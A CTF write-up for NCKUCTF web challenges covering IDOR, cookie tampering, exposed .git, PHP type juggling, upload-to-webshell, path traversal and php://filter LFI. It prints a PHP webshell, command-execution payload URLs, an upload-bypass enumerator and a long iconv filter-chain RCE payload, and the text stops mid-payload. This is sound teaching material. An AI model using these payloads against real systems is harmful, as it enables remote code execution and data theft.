# nckuctf writeup

## Web

### shiba-shop

https://chall.nckuctf.org:28100/

![image](https://hackmd.io/_uploads/HkKMF7evyx.png)

On the landing page the FLAG item has no link, so it cannot be bought. Try the links of the items just before and after it.

![image](https://hackmd.io/_uploads/B17aKXgvye.png)
![image](https://hackmd.io/_uploads/Hy4AYXxP1e.png)

Their URLs end in 5429 and 5431, so the flag item is presumably 5430. Change the id in the URL directly.

![image](https://hackmd.io/_uploads/Syh757lDJg.png)

Boom, we are in. But we do not have enough money to buy the flag.

![image](https://hackmd.io/_uploads/HkF55mxPyx.png)

Intercept the purchase request with Burp Suite to see what is actually sent to the server.

![image](https://hackmd.io/_uploads/ryj4imgDye.png)

That `wallet` field looks suspicious. Change it to 1000000000000 (the `wallet` value in the HTML form can be edited just as well). After resubmitting, the purchase succeeds.

![image](https://hackmd.io/_uploads/SJaKs7gPJl.png)

Back on the main page the flag appears at the bottom.

![image](https://hackmd.io/_uploads/rks9nQeDJg.png)

flag:||NCKUCTF{B3w4r3_0f_th3_5h1b4owo}||

Both bugs are server-side trust failures: the item id in the URL is not access-controlled (an IDOR), and the balance is read from a client-supplied field instead of server-side state.

---

### Redirect

https://chall.nckuctf.org:28101

The challenge says it is a redirect, so open Burp Suite and intercept right away. After forwarding once, the second request turns out to be a GET /flag.php.

![image](https://hackmd.io/_uploads/B1yZlEevkx.png)

Send it to Repeater and look at the response: the flag is in it.

![image](https://hackmd.io/_uploads/Hksvx4lD1l.png)

flag:||NCKUCTF{r3D1rC7_15_700_F457}||

The browser follows the redirect chain too fast for the intermediate body to be read; an intercepting proxy shows each hop's response exactly as the server sent it.

---

### Cookie

https://chall.nckuctf.org:28102/

![image](https://hackmd.io/_uploads/rkSsuKx_ll.png)

As the challenge suggests, look at the cookies first.

![image](https://hackmd.io/_uploads/rkl_FFl_ll.png)

There is one named `user`, currently set to `anonymous`. Change it to `cookie_monster`, the value the challenge asks for.

![image](https://hackmd.io/_uploads/ryiattx_lg.png)

Reload and the flag appears.

flag:||NCKUCTF{Y0U_4r3_C00K13_M0N573r}||

A cookie is just another client-controlled header; identity derived from it must be signed or looked up server-side, never trusted as sent.

---

### Robots

https://chall.nckuctf.org:28103

![image](https://hackmd.io/_uploads/BkgM9x3g_gx.png)

As the name says, fetch robots.txt first.

![image](https://hackmd.io/_uploads/Bk-hlhx_ll.png)

It lists a special path; visit it.

![image](https://hackmd.io/_uploads/r1Ve-nlOll.png)

The flag keeps spinning and cannot be read, so press F12 and read it from the page source.

![image](https://hackmd.io/_uploads/H1Z7bnldxl.png)

flag:||NCKUCTF{robots.txt_M4Y_3XP053_53Cr37_P47H}||

---

### gitleak

https://chall.nckuctf.org:28104/

As the name hints, check whether the site exposes its `.git` directory.

Target: http://chall.nckuctf.org:28104/.git/

![image](https://hackmd.io/_uploads/SkffTWMOge.png)

It does. Next, use GitTools to dump the repository: the Dumper tries to download the files under `.git` (https://github.com/internetwache/GitTools)
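Before the screenshots of the GitTools run, here is what the Dumper and the Extractor are doing under the hood, as an added, self-contained example (not GitTools' code and not the challenge's repository). It builds a throw-away repository with one commit holding a constructed `.env`, then walks `HEAD -> ref -> commit -> tree -> blob` by hand; pointing `walk()` at a real dump directory lists its files the same way.

```python
"""Walk a dumped .git directory by hand: HEAD -> ref -> commit -> tree -> blob.

Added example, not GitTools' code. build_demo_repo() constructs a throw-away
repository (constructed sample, not the challenge's) so this runs offline.
"""
from __future__ import annotations

import hashlib
import os
import tempfile
import zlib


def write_object(git_dir: str, kind: str, body: bytes) -> str:
    """Store a loose object exactly as git does: zlib(b'<kind> <len>\\0' + body)."""
    raw = b"%s %d\x00%s" % (kind.encode(), len(body), body)
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(zlib.compress(raw))
    return sha


def read_object(git_dir: str, sha: str) -> tuple[str, bytes]:
    """Inflate a loose object and strip its '<kind> <len>\\0' header."""
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    with open(path, "rb") as fh:
        raw = zlib.decompress(fh.read())
    header, body = raw.split(b"\x00", 1)
    kind, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError("corrupt object " + sha)
    return kind, body


def parse_tree(body: bytes) -> list[tuple[str, str, str]]:
    """Tree entries are '<mode> <name>\\0' followed by a 20-byte binary sha."""
    entries = []
    pos = 0
    while pos < len(body):
        nul = body.index(b"\x00", pos)
        mode, name = body[pos:nul].decode().split(" ", 1)
        entries.append((mode, name, body[nul + 1:nul + 21].hex()))
        pos = nul + 21
    return entries


def head_commit(git_dir: str) -> str:
    """Resolve HEAD, which is either 'ref: refs/heads/<branch>' or a bare sha."""
    with open(os.path.join(git_dir, "HEAD")) as fh:
        head = fh.read().strip()
    if head.startswith("ref: "):
        with open(os.path.join(git_dir, *head[5:].split("/"))) as fh:
            return fh.read().strip()
    return head


def walk(git_dir: str) -> dict[str, bytes]:
    """Return {path: content} for every file reachable from HEAD's tree."""
    kind, body = read_object(git_dir, head_commit(git_dir))
    if kind != "commit":
        raise ValueError("HEAD does not point at a commit")
    tree_sha = body.split(b"\n", 1)[0].split(b" ")[1].decode()  # first line: 'tree <sha>'
    files: dict[str, bytes] = {}
    todo = [("", tree_sha)]
    while todo:
        prefix, sha = todo.pop()
        for mode, name, entry_sha in parse_tree(read_object(git_dir, sha)[1]):
            if mode == "40000":                     # sub-tree (directory)
                todo.append((prefix + name + "/", entry_sha))
            else:                                   # blob (regular file or symlink)
                files[prefix + name] = read_object(git_dir, entry_sha)[1]
    return files


def build_demo_repo() -> str:
    """Constructed sample: one commit whose tree holds index.php and a leaked .env."""
    git_dir = os.path.join(tempfile.mkdtemp(), ".git")
    os.makedirs(os.path.join(git_dir, "refs", "heads"))
    blobs = {
        ".env": b"FLAG=NCKUCTF{constructed_sample_not_the_real_flag}\n",
        "index.php": b"<?php echo 'hi'; ?>\n",
    }
    tree = b""
    for name in sorted(blobs):                      # git keeps tree entries sorted by name
        sha = write_object(git_dir, "blob", blobs[name])
        tree += b"100644 %s\x00%s" % (name.encode(), bytes.fromhex(sha))
    tree_sha = write_object(git_dir, "tree", tree)
    commit = b"tree %s\nauthor dev <dev@example.invalid> 0 +0000\n" % tree_sha.encode()
    commit += b"committer dev <dev@example.invalid> 0 +0000\n\ninitial commit\n"
    with open(os.path.join(git_dir, "refs", "heads", "master"), "w") as fh:
        fh.write(write_object(git_dir, "commit", commit) + "\n")
    with open(os.path.join(git_dir, "HEAD"), "w") as fh:
        fh.write("ref: refs/heads/master\n")
    return git_dir


if __name__ == "__main__":
    for path, content in sorted(walk(build_demo_repo()).items()):
        print(path, "->", content.decode().rstrip())
```

Every loose object is individually fetchable over HTTP once `.git/` is exposed, which is why a dumper only needs `HEAD`, the refs and `objects/xx/yyyy...`; packed objects (`objects/pack/*.pack`) need a pack parser on top of this and are left out here.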
![image](https://hackmd.io/_uploads/B1W-xfzule.png)
![image](https://hackmd.io/_uploads/r1ZAgfGdgg.png)

Once the dump finishes, run the Extractor to unpack and rebuild it; it recovers the commits and the real file contents.

![image](https://hackmd.io/_uploads/B1_hWMMugg.png)
![image](https://hackmd.io/_uploads/rkGpXzMuel.png)

There is only one commit. `ls` inside it shows a `.env` file; `cat` it and the flag is there.

![image](https://hackmd.io/_uploads/r1PXVzzOxg.png)

flag:||NCKUCTF{D0N7_3XP053_Y0Ur_git_F01D3r}||

---

### phpisnice

https://chall.nckuctf.org:28105/

The challenge page shows a piece of PHP code.

![image](https://hackmd.io/_uploads/Sy4iJEMuel.png)

Some searching shows this is PHP type juggling. The check is `md5($A) == $A`: if the two sides compare equal, we pass.

When PHP compares two strings with `==` and both are numeric strings, it compares them as numbers. A string starting with `0e` followed only by digits, such as `"0e12"`, is a valid float in scientific notation and is read as $0 \times 10^{12}$, i.e. zero.

For example, `"0e2" == "0e3"`:

1. $0 \times 10^{2}$ == $0 \times 10^{3}$
2. that is, 0 == 0
3. returns true

So we need a string x such that:

1. x itself is of the form `0e` + digits (so it evaluates to 0), and
2. md5(x) is also of the form `0e` + digits.

Condition 1 matters: the well-known magic hashes `240610708` and `QNKCDZO` have an md5 beginning with `0e`, but the input itself does not evaluate to 0, so `md5($A) == $A` is false for them. This trick still works on PHP 8: the PHP 8 comparison change only affects a number compared with a non-numeric string, while two numeric strings are still compared numerically.

A search turns up an excellent payload collection: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md#magic-hashes

payload: 0e1137126905

Put it in the URL and resend; the flag comes back.

![screenshot 2025-08-07 232711](https://hackmd.io/_uploads/ryZZIHzOxx.png)

flag:||NCKUCTF{php_15_7h3_n1c3_14n9u493}||

---

### phpisbest

https://chall.nckuctf.org:28106/

The challenge page shows a piece of PHP code.

![image](https://hackmd.io/_uploads/BJZBEUGdxx.png)

It looks a lot like phpisnice but adds several conditions:

1. both parameters must be set
2. A and B must differ
3. strcmp() must report A and B as equal (a loose `== 0` check)
4. their md5 hashes must compare equal

Most people get stuck on conditions 2 and 3: how can two values be different yet equal? In older PHP versions, two behaviours make this possible.

#### The strcmp() problem

strcmp() expects string arguments. Passing an array instead raises a warning and makes the call return NULL (PHP 7 and earlier; PHP 8 throws a TypeError instead).

So if either A or B is an array, strcmp() returns NULL, and because the check is a loose comparison, `NULL == 0` holds and the condition passes.

![image](https://hackmd.io/_uploads/H145wLM_eg.png)

#### The md5() problem

Same story: md5() expects a string, and given an array it warns and returns NULL.

![image](https://hackmd.io/_uploads/BkuAF8MOel.png)

For `md5($A) == md5($B)` to hold, both sides must be arrays (`NULL == NULL`); if only one is, the other side is a real hash string and the comparison fails.

So set the two parameters to:

A parameter: A[]=a
B parameter: B[]=b

which passes every check:

1. A and B are set
2. A and B are different arrays
3. strcmp() errors out to NULL, and the loose comparison holds
4.
   both md5() calls error out to NULL, and that comparison holds as well

and the flag is ours.

payload: https://chall.nckuctf.org:28106/?A[]=a&B[]=b

![image](https://hackmd.io/_uploads/H1tjoIfdeg.png)

flag:||NCKUCTF{php_15_7h3_8357_14n9u493}||

---

### uploader

https://chall.nckuctf.org:28107

![image](https://hackmd.io/_uploads/B1HsMxmueg.png)

The core PHP of this challenge is below. It offers a file upload, so the guess is a file-upload vulnerability leading to RCE, then hunting for the flag.

```php
<?php
if (!empty($_FILES)) {
    $file = $_FILES['file']['tmp_name'];
    $hash = sha1(file_get_contents($file));
    $extension = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);
    $dest = '/var/www/html/upload/' . $hash . "." . $extension;
    move_uploaded_file($file, $dest);
    echo "<a href='/upload/$hash.$extension'>/upload/$hash.$extension</a>";
?>
<p><?php echo "Sucessful Uploaded !"; ?></p>
<?php } else { ?>
<p><?php echo "Please Upload A File !"; ?></p>
<form action="index.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit" value="Upload !">
</form>
<?php } ?>
```

There is no extension filtering at all, so a .php file can be uploaded directly. Start with a plain PHP webshell.

poc:

```php
<?php system($_GET['cmd']); ?>
```

After the upload succeeds the page looks like this:

![image](https://hackmd.io/_uploads/SytVuemOlg.png)

Follow the link.

![image](https://hackmd.io/_uploads/SkqjdlmOll.png)

That error only means the `cmd` parameter the PoC expects was not supplied. Try `ls`.

payload: https://chall.nckuctf.org:28107/upload/05ecab1deb5796ba5968d77c221ae3421a113629.php?cmd=ls

![screenshot 2025-08-08 121231](https://hackmd.io/_uploads/rJ78Kxmuxx.png)

Keep looking for flag-like files and cat them; the flag turns out to be in the root directory (use `;` to chain several commands).

payload: https://chall.nckuctf.org:28107/upload/05ecab1deb5796ba5968d77c221ae3421a113629.php?cmd=cd%20/;ls;cat%20flag_n2i3na

![screenshot 2025-08-08 121622](https://hackmd.io/_uploads/Sk4N5eXOxl.png)

flag:||NCKUCTF{w385h311_15_4_427}||

Note that the stored name is the sha1 of the content plus the client-supplied extension, so the hash part is predictable, but the extension is still taken from the client unchecked, which is the whole bug.

---

### uploader-waf

https://chall.nckuctf.org:28108

![image](https://hackmd.io/_uploads/HJAaqgmugg.png)

Similar to uploader; the core PHP is below. Again a file upload, so again the guess is upload-to-RCE and then hunting for the flag.

```php
<?php
if (!empty($_FILES)) {
    $file_name = $_FILES['file']['name'];
    $extension = pathinfo($file_name, PATHINFO_EXTENSION);
    $dest = '/var/www/html/upload/' .
    $file_name;
    if ($_FILES['file']['type'] === "image/png") {
        if ($extension !== "php") {
            move_uploaded_file($_FILES['file']['tmp_name'], $dest);
            echo "<a href='/upload/$file_name'>/upload/$file_name</a>";
            echo "<p>Sucessful Uploaded !</p>";
        } else {
            echo "<p>bad hecker detect! </p>";
        }
    } else {
        echo "<p>Upload fail! Please upload png file</p>";
    }
?>
<?php } else { ?>
<p><?php echo "Please Upload A File !"; ?></p>
<form action="index.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit" value="Upload !">
</form>
<?php } ?>
```

This time there are filters:

1. `$_FILES['file']['type']` must be exactly `image/png`. This is the Content-Type the client declares for the multipart part, not anything derived from the file's bytes, so it is fully attacker-controlled.
2. The last extension (what `pathinfo()` returns) must not be exactly `php`.

The bypass works as follows. A curl probe shows the server is Apache with PHP enabled, i.e. a PHP handler is installed:

```bash
┌──(kali㉿kali)-[~/…/ctf/ncku_plat/web/uploader]
└─$ curl -I https://chall.nckuctf.org:28108
HTTP/1.1 200 OK
Date: Fri, 08 Aug 2025 04:37:26 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.2.34
Content-Type: text/html; charset=UTF-8
```

And the Apache documentation (https://getdocs.org/Apache-http-server/docs/latest/mod/mod_mime) warns:

> Care should be taken when a file with multiple extensions gets associated with both a media-type and a handler. This will usually result in the request being handled by the module associated with the handler. For example, if the .imap extension is mapped to the handler imap-file (from mod_imagemap) and the .html extension is mapped to the media-type text/html, then the file world.imap.html will be associated with both the imap-file handler and text/html media-type. When it is processed, the imap-file handler will be used, and so it will be treated as a mod_imagemap imagemap file.
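To make the mod_mime rule above and the challenge's two checks concrete, here is an added example (not the challenge's code) that re-implements both and enumerates which upload names slip through. The two Apache configurations it models are assumptions, since the writeup does not show the host's actual config: an `AddHandler`/`AddType` mapping on the `.php` extension, and a `<FilesMatch "\.php$">` block of the kind stock php-apache images ship.

```python
"""Which upload names pass the uploader-waf checks *and* get executed by Apache?

Added example, not the challenge's code. waf_allows() mirrors the two checks in
the challenge's PHP; apache_runs_php() models mod_mime's multiple-extension
rule under two ASSUMED PHP set-ups (the real host config is not known).
"""
from __future__ import annotations

import re

# Assumed config A: `AddHandler application/x-httpd-php .php`. Extension lookup,
# case-insensitive, applied to every dot-separated extension in the name.
ADDHANDLER_PHP_EXTS = {"php"}
# Assumed config B: `<FilesMatch "\.php$">`. Regex on the whole file name,
# case-sensitive as written.
FILESMATCH_PHP = re.compile(r"\.php$")


def waf_allows(filename: str, content_type: str) -> bool:
    """The challenge's checks: the client-declared part Content-Type must be
    image/png, and pathinfo(PATHINFO_EXTENSION), i.e. the text after the LAST
    dot, must not be exactly 'php'."""
    if content_type != "image/png":
        return False
    ext = filename.rsplit(".", 1)[1] if "." in filename else ""
    return ext != "php"


def apache_runs_php(filename: str, config: str) -> bool:
    """Does Apache hand this file to the PHP handler?

    Under an extension mapping, mod_mime looks up each extension separately and
    a handler set by any of them wins over the media type set by the last one,
    so shell.php.png is run as PHP. FilesMatch only looks at the end of the name.
    """
    if config == "addhandler":
        exts = filename.lower().split(".")[1:]
        return any(e in ADDHANDLER_PHP_EXTS for e in exts)
    if config == "filesmatch":
        return FILESMATCH_PHP.search(filename) is not None
    raise ValueError("unknown config " + config)


def find_bypasses(candidates: list[str], config: str) -> list[str]:
    """Names an attacker can upload (with a forged image/png Content-Type) that
    the server will then execute as PHP."""
    return [n for n in candidates
            if waf_allows(n, "image/png") and apache_runs_php(n, config)]


# Constructed candidate list covering the usual extension tricks.
CANDIDATES = ["shell.php", "shell.png", "shell.php.png", "shell.PHP",
              "shell.phtml", "shell.png.php"]

if __name__ == "__main__":
    for cfg in ("addhandler", "filesmatch"):
        print(cfg, "->", find_bypasses(CANDIDATES, cfg))
```

Under the extension mapping both `shell.php.png` and `shell.PHP` get through (the `!== "php"` check is case-sensitive, the handler lookup is not); under the `FilesMatch` config none of the candidates do, and `shell.php.png` is served as a static image, so the upload code is being rescued by the web-server config rather than by its own validation. Whether `.phtml` or `.phar` also execute depends entirely on which extensions the host maps, which is why the candidate list should be extended for the target at hand.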
So when Apache serves a file it considers every dot-separated extension:

- the rightmost extension that maps to a media type decides the MIME type, e.g. `.html` → `text/html`
- any extension that maps to a handler triggers that handler, e.g. `.php` → the PHP handler

When a file matches both a media type and a handler, Apache normally lets the handler process the request.

One caveat: this only holds when PHP is wired up through an extension mapping (`AddHandler`/`AddType ... .php`). If the host uses `<FilesMatch "\.php$">` instead, only names that end in `.php` are executed and `shell.php.png` is served as a plain image.

Take `shell.php.png` as the example:

payload:

```php
<?php system($_GET['cmd']); ?>
```

Now walk through the challenge's PHP:

```php
if ($_FILES['file']['type'] === "image/png")
```

This passes: the browser picks the part's Content-Type from the `.png` suffix and sends `image/png` (and the value can be set to anything in Burp anyway).

Likewise:

```php
if ($extension !== "php" )
```

`$extension` is the last extension, `png`, so this passes too and the file is stored.

![image](https://hackmd.io/_uploads/BkZWRbQOxg.png)

As far as the upload code is concerned we uploaded a PNG, but the site has a PHP handler, so when the file is requested Apache processes it as PHP.

![image](https://hackmd.io/_uploads/SyEblz7_el.png)

Supply the actual cmd PoC:

![image](https://hackmd.io/_uploads/BkCBeGmOex.png)

Keep looking for flag-like files and cat them; the flag is in the root directory (use `;` to chain several commands).

![image](https://hackmd.io/_uploads/S1HJbG7Oge.png)

flag:||NCKUCTF{w385h311_15_4_427_4nd_m491c}||

---

### pathwalker

![image](https://hackmd.io/_uploads/Bk9sbM7dll.png)

The challenge takes a `page` parameter straight from the URL and renders that page. Click one of the links to see the format.

![image](https://hackmd.io/_uploads/ByHKfGmull.png)

Try setting `page` to `..`:

![image](https://hackmd.io/_uploads/Hy_AMzmuxg.png)

It became `...php`, so the app appends `.php` to whatever we pass. What happens with `page=../flag`?
![image](https://hackmd.io/_uploads/ryUD7MXulg.png)

payload: https://chall.nckuctf.org:28109/?page=../flag

That returns the flag directly.

flag:||NCKUCTF{p47h_724v32541_15_0u2_f213nd}||

---

### pathwalker-waf

https://chall.nckuctf.org:28110

![image](https://hackmd.io/_uploads/SkDrBzmOgg.png)

This variant adds a filter: a regular expression requires the `page` parameter to start with one of the three prefixes shown in the screenshot.

A prefix check on its own does not stop traversal. `?page=apple/../flag` satisfies the regex and still walks out of the directory, so keep adding `../` segments until the flag is found.

![image](https://hackmd.io/_uploads/Hy7f8Gm_le.png)

payload: https://chall.nckuctf.org:28110/?page=apple/../../flag

flag:||NCKUCTF{p47h_724v32541_h45_4107_721ck}||

---

### lfi

https://chall.nckuctf.org:28111

![image](https://hackmd.io/_uploads/r14Hq_Q_lx.png)

Browsing to the cappo page reveals where the flag is.

![image](https://hackmd.io/_uploads/rJjhmy8dgg.png)

Visiting that location, however, says there is no flag.

![image](https://hackmd.io/_uploads/HkV5NJU_gg.png)

Following [this article](https://www.riskinsight-wavestone.com/en/2022/09/barbhack-2022-leveraging-php-local-file-inclusion-to-achieve-universal-rce/?utm_source=chatgpt.com), we can use a `php://filter` payload to dump the PHP source instead of executing it:

> Using this technique, it is not possible at first to exfiltrate PHP source files, since they are executed when they enter the include or require statement. However, it is possible to rely on the php:// stream and its filter function to apply a Base64 encoding before including the file, therefore changing the active content into innocent plaintext.
> For example: http://webapp/?p=php://filter/convert.base64-encode/resource=index.php

payload: https://chall.nckuctf.org:28111/?page=php://filter/convert.base64-encode/resource=flag

The resource is just `flag` because the flag file sits in the web root `/var/www/html` next to the including script, and PHP resolves a relative include path there by default; no directory traversal is needed.

The base64-encoded source comes back:

![image](https://hackmd.io/_uploads/BJJXBkIugl.png)

Decoding it gives the source and the flag (it was in a comment, which is why the page showed nothing).

![image](https://hackmd.io/_uploads/rJ8uBJ8Oxe.png)

flag:||NCKUCTF{1f1_15_7h3_900d_ch4nc3}||

---

### lfi2rce (official solution)

https://chall.nckuctf.org:28112

The cappo page hints that the flag is in the root directory.

![image](https://hackmd.io/_uploads/SkPuZZI_le.png)

Many LFI-to-RCE techniques from the web were tried without success, and log file access was blocked as well:
https://swisskyrepo.github.io/PayloadsAllTheThings/File%20Inclusion/LFI-to-RCE/

In the end the [official solution](https://www.youtube.com/watch?v=PqydmB-IoYc&list=PLFFwfkaPB2mra818QJIiPJtXFShdndl9z&index=3&t=2992s) was the way.

It also relies on the php:// wrapper: a php://filter chain that, through a long series of iconv conversions and base64 round trips, makes the filter output itself contain PHP code, so the include executes attacker-chosen PHP without any file having to exist on disk. The ready-made payload was used as-is. PHP is just too cool.

Replace the command inside `system()` at the end of the payload with the command you want to run.

payload: https://chall.nckuctf.org:28112/?page= + the php payload below

php payload ([source](https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT)):

<details>

```text
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.ISO-IR-156.8859_9|convert.iconv.CSISOLATINGREEK.MSCP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.iconv.CSISO99NAPLPS.CP902|convert.iconv.ISO-IR-143.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.PT154.874|convert.iconv.CSISO2022KR.UTF-32|convert.iconv.CSIBM901.ISO_6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO2022KR.UTF16|convert.iconv.LATIN6.CSUCS4|convert.iconv.UTF-32BE.ISO_6937-2:1983|convert.iconv.ISO-IR-111.CSWINDOWS31J|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSA_T500.EUCJP-WIN|convert.iconv.CP855.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.UCS-4BE|convert.iconv.OSF00010004.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.ISO-10646/UTF-8|convert.iconv.BALTIC.SHIFT_JISX0213|convert.iconv.CP949.CP1361|convert.iconv.CSISOLATIN2.T.61|convert.iconv.IBM932.BIG-5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.NAPLPS.UCS-4|convert.iconv.ISO_8859-4.T.618BIT|convert.iconv.CSISO103T618BIT.BIG5-HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.BIGFIVE.CSIBM943|convert.iconv.LATIN6.WINDOWS-1258|convert.iconv.CP1258.CSISO103T618BIT|convert.iconv.NAPLPS.OSF10020359|convert.iconv.WINDOWS-1256.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-GR.UNICODE|convert.iconv.ISO_8859-14:1998.UTF32BE|convert.iconv.OSF00010009.ISO2022JP2|convert.iconv.UTF16.ISO-10646/UTF-8|convert.iconv.UTF-16.UTF8|convert.iconv.ISO_8859-14:1998.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.BIGFIVE.CSIBM943|convert.iconv.LATIN6.WINDOWS-1258|convert.iconv.CP1258.CSISO103T618BIT|convert.iconv.NAPLPS.OSF10020359|convert.iconv.WINDOWS-1256.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-103.CSEUCPKDFMTJAPANESE|convert.iconv.OSF00010002.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.CSEUCKR.UTF-32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.UCS-4BE|convert.iconv.OSF00010004.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UCS-4BE.855|convert.iconv.ISO88599.CSISO90|convert.iconv.ISO_6937:1992.10646-1:1993|convert.iconv.CP773.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UK.852|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.iconv.ISO6937.UCS-2LE|convert.iconv.CP864.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.ISO-IR-156.8859_9|convert.iconv.CSISOLATINGREEK.MSCP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.iconv.CSIBM932.IBM866NAV|convert.iconv.IBM775.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.iconv.CSIBM932.IBM866NAV|convert.iconv.IBM775.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UCS-4BE.855|convert.iconv.ISO88599.CSISO90|convert.iconv.ISO_6937:1992.10646-1:1993|convert.iconv.CP773.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.OSF00010104|convert.iconv.CP860.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UTF-32BE.MS936|convert.iconv.8859_5.UTF32|convert.